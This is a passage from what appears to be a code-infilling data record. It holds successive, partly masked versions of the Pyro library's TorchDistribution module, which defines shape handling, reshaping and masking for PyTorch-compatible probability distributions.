self.\n event_shape)\n\n\nclass MaskedDistribution(TorchDistribution):\n \"\"\"\n Masks a distribution by a zero-one tensor that is broadcastable to the\n distribution's :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n :param torch.Tensor mask: A zero-one valued float tensor.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, mask):\n if broadcast_shape(mask.shape, base_dist.batch_shape\n ) != base_dist.batch_shape:\n raise ValueError(\n 'Expected mask.shape to be broadcastable to base_dist.batch_shape, actual {} vs {}'\n .format(mask.shape, base_dist.batch_shape))\n self.base_dist = base_dist\n self._mask = mask\n super(MaskedDistribution, self).__init__(base_dist.batch_shape,\n base_dist.event_shape)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n @constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape)\n\n def log_prob(self, value):\n return self.base_dist.log_prob(value) * self._mask\n\n def score_parts(self, value):\n return self.base_dist.score_parts(value) * self._mask\n\n def enumerate_support(self):\n return self.base_dist.enumerate_support()\n\n @property\n def mean(self):\n return self.base_dist.mean\n\n @property\n def variance(self):\n return self.base_dist.variance\n",
"step-2": "<mask token>\n\n\nclass TorchDistributionMixin(Distribution):\n <mask token>\n <mask token>\n <mask token>\n\n def shape(self, sample_shape=torch.Size()):\n \"\"\"\n The tensor shape of samples from this distribution.\n\n Samples are of shape::\n\n d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape\n\n :param sample_shape: the size of the iid batch to be drawn from the\n distribution.\n :type sample_shape: torch.Size\n :return: Tensor shape of samples.\n :rtype: torch.Size\n \"\"\"\n return sample_shape + self.batch_shape + self.event_shape\n <mask token>\n <mask token>\n\n def reshape(self, sample_shape=None, extra_event_dims=None):\n raise Exception(\n \"\"\"\n .reshape(sample_shape=s, extra_event_dims=n) was renamed and split into\n .expand_by(sample_shape=s).independent(reinterpreted_batch_ndims=n).\"\"\"\n )\n <mask token>\n <mask token>\n\n\nclass TorchDistribution(torch.distributions.Distribution,\n TorchDistributionMixin):\n \"\"\"\n Base class for PyTorch-compatible distributions with Pyro support.\n\n This should be the base class for almost all new Pyro distributions.\n\n .. note::\n\n Parameters and data should be of type :class:`~torch.Tensor`\n and all methods return type :class:`~torch.Tensor` unless\n otherwise noted.\n\n **Tensor Shapes**:\n\n TorchDistributions provide a method ``.shape()`` for the tensor shape of samples::\n\n x = d.sample(sample_shape)\n assert x.shape == d.shape(sample_shape)\n\n Pyro follows the same distribution shape semantics as PyTorch. It distinguishes\n between three different roles for tensor shapes of samples:\n\n - *sample shape* corresponds to the shape of the iid samples drawn from the distribution.\n This is taken as an argument by the distribution's `sample` method.\n - *batch shape* corresponds to non-identical (independent) parameterizations of\n the distribution, inferred from the distribution's parameter shapes. This is\n fixed for a distribution instance.\n - *event shape* corresponds to the event dimensions of the distribution, which\n is fixed for a distribution class. 
These are collapsed when we try to score\n a sample from the distribution via `d.log_prob(x)`.\n\n These shapes are related by the equation::\n\n assert d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape\n\n Distributions provide a vectorized\n :meth`~torch.distributions.distribution.Distribution.log_prob` method that\n evaluates the log probability density of each event in a batch\n independently, returning a tensor of shape\n ``sample_shape + d.batch_shape``::\n\n x = d.sample(sample_shape)\n assert x.shape == d.shape(sample_shape)\n log_p = d.log_prob(x)\n assert log_p.shape == sample_shape + d.batch_shape\n\n **Implementing New Distributions**:\n\n Derived classes must implement the methods\n :meth:`~torch.distributions.distribution.Distribution.sample`\n (or :meth:`~torch.distributions.distribution.Distribution.rsample` if\n ``.has_rsample == True``) and\n :meth:`~torch.distributions.distribution.Distribution.log_prob`, and must\n implement the properties\n :attr:`~torch.distributions.distribution.Distribution.batch_shape`,\n and :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n Discrete classes may also implement the\n :meth:`~torch.distributions.distribution.Distribution.enumerate_support`\n method to improve gradient estimates and set\n ``.has_enumerate_support = True``.\n \"\"\"\n pass\n\n\nclass ReshapedDistribution(TorchDistribution):\n \"\"\"\n Reshapes a distribution by adding ``sample_shape`` to its total shape\n and adding ``reinterpreted_batch_ndims`` to its\n :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n\n :param torch.Size sample_shape: The size of the iid batch to be drawn from\n the distribution.\n :param int reinterpreted_batch_ndims: The number of extra event dimensions that will\n be considered dependent.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, sample_shape=torch.Size(),\n reinterpreted_batch_ndims=0):\n sample_shape = torch.Size(sample_shape)\n if reinterpreted_batch_ndims > len(sample_shape + base_dist.batch_shape\n ):\n raise ValueError(\n 'Expected reinterpreted_batch_ndims <= len(sample_shape + base_dist.batch_shape), actual {} vs {}'\n .format(reinterpreted_batch_ndims, len(sample_shape +\n base_dist.batch_shape)))\n self.base_dist = base_dist\n self.sample_shape = sample_shape\n self.reinterpreted_batch_ndims = reinterpreted_batch_ndims\n shape = sample_shape + base_dist.batch_shape + base_dist.event_shape\n batch_dim = len(shape) - reinterpreted_batch_ndims - len(base_dist.\n event_shape)\n batch_shape, event_shape = shape[:batch_dim], shape[batch_dim:]\n super(ReshapedDistribution, self).__init__(batch_shape, event_shape)\n\n def expand_by(self, sample_shape):\n base_dist = self.base_dist\n sample_shape = torch.Size(sample_shape) + self.sample_shape\n reinterpreted_batch_ndims = self.reinterpreted_batch_ndims\n return ReshapedDistribution(base_dist, sample_shape,\n reinterpreted_batch_ndims)\n\n def independent(self, reinterpreted_batch_ndims=None):\n if reinterpreted_batch_ndims is None:\n reinterpreted_batch_ndims = len(self.batch_shape)\n base_dist = self.base_dist\n sample_shape = self.sample_shape\n reinterpreted_batch_ndims = (self.reinterpreted_batch_ndims +\n reinterpreted_batch_ndims)\n return ReshapedDistribution(base_dist, sample_shape,\n reinterpreted_batch_ndims)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n 
@constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape + self.sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape + self.sample_shape)\n\n def log_prob(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() -\n self.event_dim])\n return sum_rightmost(self.base_dist.log_prob(value), self.\n reinterpreted_batch_ndims).expand(shape)\n\n def score_parts(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() -\n self.event_dim])\n log_prob, score_function, entropy_term = self.base_dist.score_parts(\n value)\n log_prob = sum_rightmost(log_prob, self.reinterpreted_batch_ndims\n ).expand(shape)\n if not isinstance(score_function, numbers.Number):\n score_function = sum_rightmost(score_function, self.\n reinterpreted_batch_ndims).expand(shape)\n if not isinstance(entropy_term, numbers.Number):\n entropy_term = sum_rightmost(entropy_term, self.\n reinterpreted_batch_ndims).expand(shape)\n return ScoreParts(log_prob, score_function, entropy_term)\n\n def enumerate_support(self):\n if self.reinterpreted_batch_ndims:\n raise NotImplementedError(\n 'Pyro does not enumerate over cartesian products')\n samples = self.base_dist.enumerate_support()\n if not self.sample_shape:\n return samples\n enum_shape, base_shape = samples.shape[:1], samples.shape[1:]\n samples = samples.reshape(enum_shape + (1,) * len(self.sample_shape\n ) + base_shape)\n samples = samples.expand(enum_shape + self.sample_shape + base_shape)\n return samples\n\n @property\n def mean(self):\n return self.base_dist.mean.expand(self.batch_shape + self.event_shape)\n\n @property\n def variance(self):\n return self.base_dist.variance.expand(self.batch_shape + self.\n event_shape)\n\n\nclass MaskedDistribution(TorchDistribution):\n \"\"\"\n Masks a distribution by a zero-one tensor that is broadcastable to the\n distribution's :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n :param torch.Tensor mask: A zero-one valued float tensor.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, mask):\n if broadcast_shape(mask.shape, base_dist.batch_shape\n ) != base_dist.batch_shape:\n raise ValueError(\n 'Expected mask.shape to be broadcastable to base_dist.batch_shape, actual {} vs {}'\n .format(mask.shape, base_dist.batch_shape))\n self.base_dist = base_dist\n self._mask = mask\n super(MaskedDistribution, self).__init__(base_dist.batch_shape,\n base_dist.event_shape)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n @constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape)\n\n def log_prob(self, value):\n return self.base_dist.log_prob(value) * self._mask\n\n def score_parts(self, value):\n return self.base_dist.score_parts(value) * self._mask\n\n def enumerate_support(self):\n return self.base_dist.enumerate_support()\n\n @property\n def mean(self):\n return self.base_dist.mean\n\n @property\n def variance(self):\n return self.base_dist.variance\n",
"step-3": "<mask token>\n\n\nclass TorchDistributionMixin(Distribution):\n <mask token>\n\n def __call__(self, sample_shape=torch.Size()):\n \"\"\"\n Samples a random value.\n\n This is reparameterized whenever possible, calling\n :meth:`~torch.distributions.distribution.Distribution.rsample` for\n reparameterized distributions and\n :meth:`~torch.distributions.distribution.Distribution.sample` for\n non-reparameterized distributions.\n\n :param sample_shape: the size of the iid batch to be drawn from the\n distribution.\n :type sample_shape: torch.Size\n :return: A random value or batch of random values (if parameters are\n batched). The shape of the result should be `self.shape()`.\n :rtype: torch.Tensor\n \"\"\"\n return self.rsample(sample_shape) if self.has_rsample else self.sample(\n sample_shape)\n <mask token>\n\n def shape(self, sample_shape=torch.Size()):\n \"\"\"\n The tensor shape of samples from this distribution.\n\n Samples are of shape::\n\n d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape\n\n :param sample_shape: the size of the iid batch to be drawn from the\n distribution.\n :type sample_shape: torch.Size\n :return: Tensor shape of samples.\n :rtype: torch.Size\n \"\"\"\n return sample_shape + self.batch_shape + self.event_shape\n <mask token>\n <mask token>\n\n def reshape(self, sample_shape=None, extra_event_dims=None):\n raise Exception(\n \"\"\"\n .reshape(sample_shape=s, extra_event_dims=n) was renamed and split into\n .expand_by(sample_shape=s).independent(reinterpreted_batch_ndims=n).\"\"\"\n )\n <mask token>\n <mask token>\n\n\nclass TorchDistribution(torch.distributions.Distribution,\n TorchDistributionMixin):\n \"\"\"\n Base class for PyTorch-compatible distributions with Pyro support.\n\n This should be the base class for almost all new Pyro distributions.\n\n .. note::\n\n Parameters and data should be of type :class:`~torch.Tensor`\n and all methods return type :class:`~torch.Tensor` unless\n otherwise noted.\n\n **Tensor Shapes**:\n\n TorchDistributions provide a method ``.shape()`` for the tensor shape of samples::\n\n x = d.sample(sample_shape)\n assert x.shape == d.shape(sample_shape)\n\n Pyro follows the same distribution shape semantics as PyTorch. It distinguishes\n between three different roles for tensor shapes of samples:\n\n - *sample shape* corresponds to the shape of the iid samples drawn from the distribution.\n This is taken as an argument by the distribution's `sample` method.\n - *batch shape* corresponds to non-identical (independent) parameterizations of\n the distribution, inferred from the distribution's parameter shapes. This is\n fixed for a distribution instance.\n - *event shape* corresponds to the event dimensions of the distribution, which\n is fixed for a distribution class. 
These are collapsed when we try to score\n a sample from the distribution via `d.log_prob(x)`.\n\n These shapes are related by the equation::\n\n assert d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape\n\n Distributions provide a vectorized\n :meth`~torch.distributions.distribution.Distribution.log_prob` method that\n evaluates the log probability density of each event in a batch\n independently, returning a tensor of shape\n ``sample_shape + d.batch_shape``::\n\n x = d.sample(sample_shape)\n assert x.shape == d.shape(sample_shape)\n log_p = d.log_prob(x)\n assert log_p.shape == sample_shape + d.batch_shape\n\n **Implementing New Distributions**:\n\n Derived classes must implement the methods\n :meth:`~torch.distributions.distribution.Distribution.sample`\n (or :meth:`~torch.distributions.distribution.Distribution.rsample` if\n ``.has_rsample == True``) and\n :meth:`~torch.distributions.distribution.Distribution.log_prob`, and must\n implement the properties\n :attr:`~torch.distributions.distribution.Distribution.batch_shape`,\n and :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n Discrete classes may also implement the\n :meth:`~torch.distributions.distribution.Distribution.enumerate_support`\n method to improve gradient estimates and set\n ``.has_enumerate_support = True``.\n \"\"\"\n pass\n\n\nclass ReshapedDistribution(TorchDistribution):\n \"\"\"\n Reshapes a distribution by adding ``sample_shape`` to its total shape\n and adding ``reinterpreted_batch_ndims`` to its\n :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n\n :param torch.Size sample_shape: The size of the iid batch to be drawn from\n the distribution.\n :param int reinterpreted_batch_ndims: The number of extra event dimensions that will\n be considered dependent.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, sample_shape=torch.Size(),\n reinterpreted_batch_ndims=0):\n sample_shape = torch.Size(sample_shape)\n if reinterpreted_batch_ndims > len(sample_shape + base_dist.batch_shape\n ):\n raise ValueError(\n 'Expected reinterpreted_batch_ndims <= len(sample_shape + base_dist.batch_shape), actual {} vs {}'\n .format(reinterpreted_batch_ndims, len(sample_shape +\n base_dist.batch_shape)))\n self.base_dist = base_dist\n self.sample_shape = sample_shape\n self.reinterpreted_batch_ndims = reinterpreted_batch_ndims\n shape = sample_shape + base_dist.batch_shape + base_dist.event_shape\n batch_dim = len(shape) - reinterpreted_batch_ndims - len(base_dist.\n event_shape)\n batch_shape, event_shape = shape[:batch_dim], shape[batch_dim:]\n super(ReshapedDistribution, self).__init__(batch_shape, event_shape)\n\n def expand_by(self, sample_shape):\n base_dist = self.base_dist\n sample_shape = torch.Size(sample_shape) + self.sample_shape\n reinterpreted_batch_ndims = self.reinterpreted_batch_ndims\n return ReshapedDistribution(base_dist, sample_shape,\n reinterpreted_batch_ndims)\n\n def independent(self, reinterpreted_batch_ndims=None):\n if reinterpreted_batch_ndims is None:\n reinterpreted_batch_ndims = len(self.batch_shape)\n base_dist = self.base_dist\n sample_shape = self.sample_shape\n reinterpreted_batch_ndims = (self.reinterpreted_batch_ndims +\n reinterpreted_batch_ndims)\n return ReshapedDistribution(base_dist, sample_shape,\n reinterpreted_batch_ndims)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n 
@constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape + self.sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape + self.sample_shape)\n\n def log_prob(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() -\n self.event_dim])\n return sum_rightmost(self.base_dist.log_prob(value), self.\n reinterpreted_batch_ndims).expand(shape)\n\n def score_parts(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() -\n self.event_dim])\n log_prob, score_function, entropy_term = self.base_dist.score_parts(\n value)\n log_prob = sum_rightmost(log_prob, self.reinterpreted_batch_ndims\n ).expand(shape)\n if not isinstance(score_function, numbers.Number):\n score_function = sum_rightmost(score_function, self.\n reinterpreted_batch_ndims).expand(shape)\n if not isinstance(entropy_term, numbers.Number):\n entropy_term = sum_rightmost(entropy_term, self.\n reinterpreted_batch_ndims).expand(shape)\n return ScoreParts(log_prob, score_function, entropy_term)\n\n def enumerate_support(self):\n if self.reinterpreted_batch_ndims:\n raise NotImplementedError(\n 'Pyro does not enumerate over cartesian products')\n samples = self.base_dist.enumerate_support()\n if not self.sample_shape:\n return samples\n enum_shape, base_shape = samples.shape[:1], samples.shape[1:]\n samples = samples.reshape(enum_shape + (1,) * len(self.sample_shape\n ) + base_shape)\n samples = samples.expand(enum_shape + self.sample_shape + base_shape)\n return samples\n\n @property\n def mean(self):\n return self.base_dist.mean.expand(self.batch_shape + self.event_shape)\n\n @property\n def variance(self):\n return self.base_dist.variance.expand(self.batch_shape + self.\n event_shape)\n\n\nclass MaskedDistribution(TorchDistribution):\n \"\"\"\n Masks a distribution by a zero-one tensor that is broadcastable to the\n distribution's :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n :param torch.Tensor mask: A zero-one valued float tensor.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, mask):\n if broadcast_shape(mask.shape, base_dist.batch_shape\n ) != base_dist.batch_shape:\n raise ValueError(\n 'Expected mask.shape to be broadcastable to base_dist.batch_shape, actual {} vs {}'\n .format(mask.shape, base_dist.batch_shape))\n self.base_dist = base_dist\n self._mask = mask\n super(MaskedDistribution, self).__init__(base_dist.batch_shape,\n base_dist.event_shape)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n @constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape)\n\n def log_prob(self, value):\n return self.base_dist.log_prob(value) * self._mask\n\n def score_parts(self, value):\n return self.base_dist.score_parts(value) * self._mask\n\n def enumerate_support(self):\n return self.base_dist.enumerate_support()\n\n @property\n def mean(self):\n return self.base_dist.mean\n\n @property\n def variance(self):\n return self.base_dist.variance\n",
"step-4": "<mask token>\n\n\nclass TorchDistributionMixin(Distribution):\n <mask token>\n\n def __call__(self, sample_shape=torch.Size()):\n \"\"\"\n Samples a random value.\n\n This is reparameterized whenever possible, calling\n :meth:`~torch.distributions.distribution.Distribution.rsample` for\n reparameterized distributions and\n :meth:`~torch.distributions.distribution.Distribution.sample` for\n non-reparameterized distributions.\n\n :param sample_shape: the size of the iid batch to be drawn from the\n distribution.\n :type sample_shape: torch.Size\n :return: A random value or batch of random values (if parameters are\n batched). The shape of the result should be `self.shape()`.\n :rtype: torch.Tensor\n \"\"\"\n return self.rsample(sample_shape) if self.has_rsample else self.sample(\n sample_shape)\n <mask token>\n\n def shape(self, sample_shape=torch.Size()):\n \"\"\"\n The tensor shape of samples from this distribution.\n\n Samples are of shape::\n\n d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape\n\n :param sample_shape: the size of the iid batch to be drawn from the\n distribution.\n :type sample_shape: torch.Size\n :return: Tensor shape of samples.\n :rtype: torch.Size\n \"\"\"\n return sample_shape + self.batch_shape + self.event_shape\n\n def expand(self, batch_shape):\n \"\"\"\n Expands a distribution to a desired\n :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n Note that this is more general than :meth:`expand_by` because\n ``d.expand_by(sample_shape)`` can be reduced to\n ``d.expand(sample_shape + d.batch_shape)``.\n\n :param torch.Size batch_shape: The target ``batch_shape``. This must\n compatible with ``self.batch_shape`` similar to the requirements\n of :func:`torch.Tensor.expand`: the target ``batch_shape`` must\n be at least as long as ``self.batch_shape``, and for each\n non-singleton dim of ``self.batch_shape``, ``batch_shape`` must\n either agree or be set to ``-1``.\n :return: An expanded version of this distribution.\n :rtype: :class:`ReshapedDistribution`\n \"\"\"\n batch_shape = list(batch_shape)\n if len(batch_shape) < len(self.batch_shape):\n raise ValueError(\n 'Expected len(batch_shape) >= len(self.batch_shape), actual {} vs {}'\n .format(len(batch_shape), len(self.batch_shape)))\n for dim in range(-1, -1 - len(self.batch_shape), -1):\n if batch_shape[dim] == -1:\n batch_shape[dim] = self.batch_shape[dim]\n elif batch_shape[dim] != self.batch_shape[dim]:\n if self.batch_shape[dim] != 1:\n raise ValueError(\n 'Cannot broadcast dim {} of size {} to size {}'.\n format(dim, self.batch_shape[dim], batch_shape[dim]))\n else:\n raise NotImplementedError(\n 'https://github.com/uber/pyro/issues/1119')\n sample_shape = batch_shape[:len(batch_shape) - len(self.batch_shape)]\n return self.expand_by(sample_shape)\n <mask token>\n\n def reshape(self, sample_shape=None, extra_event_dims=None):\n raise Exception(\n \"\"\"\n .reshape(sample_shape=s, extra_event_dims=n) was renamed and split into\n .expand_by(sample_shape=s).independent(reinterpreted_batch_ndims=n).\"\"\"\n )\n\n def independent(self, reinterpreted_batch_ndims=None):\n \"\"\"\n Reinterprets the ``n`` rightmost dimensions of this distributions\n :attr:`~torch.distributions.distribution.Distribution.batch_shape`\n as event dims, adding them to the left side of\n :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n\n Example::\n\n >>> [d1.batch_shape, d1.event_shape]\n [torch.Size((2, 3)), torch.Size((4, 5))]\n >>> d2 = d1.independent(1)\n >>> 
[d2.batch_shape, d2.event_shape]\n [torch.Size((2,)), torch.Size((3, 4, 5))]\n >>> d3 = d1.independent(2)\n >>> [d3.batch_shape, d3.event_shape]\n [torch.Size(()), torch.Size((2, 3, 4, 5))]\n\n :param int reinterpreted_batch_ndims: The number of batch dimensions\n to reinterpret as event dimensions.\n :return: A reshaped version of this distribution.\n :rtype: :class:`ReshapedDistribution`\n \"\"\"\n if reinterpreted_batch_ndims is None:\n reinterpreted_batch_ndims = len(self.batch_shape)\n return ReshapedDistribution(self, reinterpreted_batch_ndims=\n reinterpreted_batch_ndims)\n\n def mask(self, mask):\n \"\"\"\n Masks a distribution by a zero-one tensor that is broadcastable to the\n distributions :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n :param torch.Tensor mask: A zero-one valued float tensor.\n :return: A masked copy of this distribution.\n :rtype: :class:`MaskedDistribution`\n \"\"\"\n return MaskedDistribution(self, mask)\n\n\nclass TorchDistribution(torch.distributions.Distribution,\n TorchDistributionMixin):\n \"\"\"\n Base class for PyTorch-compatible distributions with Pyro support.\n\n This should be the base class for almost all new Pyro distributions.\n\n .. note::\n\n Parameters and data should be of type :class:`~torch.Tensor`\n and all methods return type :class:`~torch.Tensor` unless\n otherwise noted.\n\n **Tensor Shapes**:\n\n TorchDistributions provide a method ``.shape()`` for the tensor shape of samples::\n\n x = d.sample(sample_shape)\n assert x.shape == d.shape(sample_shape)\n\n Pyro follows the same distribution shape semantics as PyTorch. It distinguishes\n between three different roles for tensor shapes of samples:\n\n - *sample shape* corresponds to the shape of the iid samples drawn from the distribution.\n This is taken as an argument by the distribution's `sample` method.\n - *batch shape* corresponds to non-identical (independent) parameterizations of\n the distribution, inferred from the distribution's parameter shapes. This is\n fixed for a distribution instance.\n - *event shape* corresponds to the event dimensions of the distribution, which\n is fixed for a distribution class. 
These are collapsed when we try to score\n a sample from the distribution via `d.log_prob(x)`.\n\n These shapes are related by the equation::\n\n assert d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape\n\n Distributions provide a vectorized\n :meth`~torch.distributions.distribution.Distribution.log_prob` method that\n evaluates the log probability density of each event in a batch\n independently, returning a tensor of shape\n ``sample_shape + d.batch_shape``::\n\n x = d.sample(sample_shape)\n assert x.shape == d.shape(sample_shape)\n log_p = d.log_prob(x)\n assert log_p.shape == sample_shape + d.batch_shape\n\n **Implementing New Distributions**:\n\n Derived classes must implement the methods\n :meth:`~torch.distributions.distribution.Distribution.sample`\n (or :meth:`~torch.distributions.distribution.Distribution.rsample` if\n ``.has_rsample == True``) and\n :meth:`~torch.distributions.distribution.Distribution.log_prob`, and must\n implement the properties\n :attr:`~torch.distributions.distribution.Distribution.batch_shape`,\n and :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n Discrete classes may also implement the\n :meth:`~torch.distributions.distribution.Distribution.enumerate_support`\n method to improve gradient estimates and set\n ``.has_enumerate_support = True``.\n \"\"\"\n pass\n\n\nclass ReshapedDistribution(TorchDistribution):\n \"\"\"\n Reshapes a distribution by adding ``sample_shape`` to its total shape\n and adding ``reinterpreted_batch_ndims`` to its\n :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n\n :param torch.Size sample_shape: The size of the iid batch to be drawn from\n the distribution.\n :param int reinterpreted_batch_ndims: The number of extra event dimensions that will\n be considered dependent.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, sample_shape=torch.Size(),\n reinterpreted_batch_ndims=0):\n sample_shape = torch.Size(sample_shape)\n if reinterpreted_batch_ndims > len(sample_shape + base_dist.batch_shape\n ):\n raise ValueError(\n 'Expected reinterpreted_batch_ndims <= len(sample_shape + base_dist.batch_shape), actual {} vs {}'\n .format(reinterpreted_batch_ndims, len(sample_shape +\n base_dist.batch_shape)))\n self.base_dist = base_dist\n self.sample_shape = sample_shape\n self.reinterpreted_batch_ndims = reinterpreted_batch_ndims\n shape = sample_shape + base_dist.batch_shape + base_dist.event_shape\n batch_dim = len(shape) - reinterpreted_batch_ndims - len(base_dist.\n event_shape)\n batch_shape, event_shape = shape[:batch_dim], shape[batch_dim:]\n super(ReshapedDistribution, self).__init__(batch_shape, event_shape)\n\n def expand_by(self, sample_shape):\n base_dist = self.base_dist\n sample_shape = torch.Size(sample_shape) + self.sample_shape\n reinterpreted_batch_ndims = self.reinterpreted_batch_ndims\n return ReshapedDistribution(base_dist, sample_shape,\n reinterpreted_batch_ndims)\n\n def independent(self, reinterpreted_batch_ndims=None):\n if reinterpreted_batch_ndims is None:\n reinterpreted_batch_ndims = len(self.batch_shape)\n base_dist = self.base_dist\n sample_shape = self.sample_shape\n reinterpreted_batch_ndims = (self.reinterpreted_batch_ndims +\n reinterpreted_batch_ndims)\n return ReshapedDistribution(base_dist, sample_shape,\n reinterpreted_batch_ndims)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n 
@constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape + self.sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape + self.sample_shape)\n\n def log_prob(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() -\n self.event_dim])\n return sum_rightmost(self.base_dist.log_prob(value), self.\n reinterpreted_batch_ndims).expand(shape)\n\n def score_parts(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() -\n self.event_dim])\n log_prob, score_function, entropy_term = self.base_dist.score_parts(\n value)\n log_prob = sum_rightmost(log_prob, self.reinterpreted_batch_ndims\n ).expand(shape)\n if not isinstance(score_function, numbers.Number):\n score_function = sum_rightmost(score_function, self.\n reinterpreted_batch_ndims).expand(shape)\n if not isinstance(entropy_term, numbers.Number):\n entropy_term = sum_rightmost(entropy_term, self.\n reinterpreted_batch_ndims).expand(shape)\n return ScoreParts(log_prob, score_function, entropy_term)\n\n def enumerate_support(self):\n if self.reinterpreted_batch_ndims:\n raise NotImplementedError(\n 'Pyro does not enumerate over cartesian products')\n samples = self.base_dist.enumerate_support()\n if not self.sample_shape:\n return samples\n enum_shape, base_shape = samples.shape[:1], samples.shape[1:]\n samples = samples.reshape(enum_shape + (1,) * len(self.sample_shape\n ) + base_shape)\n samples = samples.expand(enum_shape + self.sample_shape + base_shape)\n return samples\n\n @property\n def mean(self):\n return self.base_dist.mean.expand(self.batch_shape + self.event_shape)\n\n @property\n def variance(self):\n return self.base_dist.variance.expand(self.batch_shape + self.\n event_shape)\n\n\nclass MaskedDistribution(TorchDistribution):\n \"\"\"\n Masks a distribution by a zero-one tensor that is broadcastable to the\n distribution's :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n :param torch.Tensor mask: A zero-one valued float tensor.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, mask):\n if broadcast_shape(mask.shape, base_dist.batch_shape\n ) != base_dist.batch_shape:\n raise ValueError(\n 'Expected mask.shape to be broadcastable to base_dist.batch_shape, actual {} vs {}'\n .format(mask.shape, base_dist.batch_shape))\n self.base_dist = base_dist\n self._mask = mask\n super(MaskedDistribution, self).__init__(base_dist.batch_shape,\n base_dist.event_shape)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n @constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape)\n\n def log_prob(self, value):\n return self.base_dist.log_prob(value) * self._mask\n\n def score_parts(self, value):\n return self.base_dist.score_parts(value) * self._mask\n\n def enumerate_support(self):\n return self.base_dist.enumerate_support()\n\n @property\n def mean(self):\n return self.base_dist.mean\n\n @property\n def variance(self):\n return self.base_dist.variance\n",
"step-5": "from __future__ import absolute_import, division, print_function\n\nimport numbers\n\nimport torch\nfrom torch.distributions import constraints\n\nfrom pyro.distributions.distribution import Distribution\nfrom pyro.distributions.score_parts import ScoreParts\nfrom pyro.distributions.util import broadcast_shape, sum_rightmost\n\n\nclass TorchDistributionMixin(Distribution):\n \"\"\"\n Mixin to provide Pyro compatibility for PyTorch distributions.\n\n You should instead use `TorchDistribution` for new distribution classes.\n\n This is mainly useful for wrapping existing PyTorch distributions for\n use in Pyro. Derived classes must first inherit from\n :class:`torch.distributions.distribution.Distribution` and then inherit\n from :class:`TorchDistributionMixin`.\n \"\"\"\n def __call__(self, sample_shape=torch.Size()):\n \"\"\"\n Samples a random value.\n\n This is reparameterized whenever possible, calling\n :meth:`~torch.distributions.distribution.Distribution.rsample` for\n reparameterized distributions and\n :meth:`~torch.distributions.distribution.Distribution.sample` for\n non-reparameterized distributions.\n\n :param sample_shape: the size of the iid batch to be drawn from the\n distribution.\n :type sample_shape: torch.Size\n :return: A random value or batch of random values (if parameters are\n batched). The shape of the 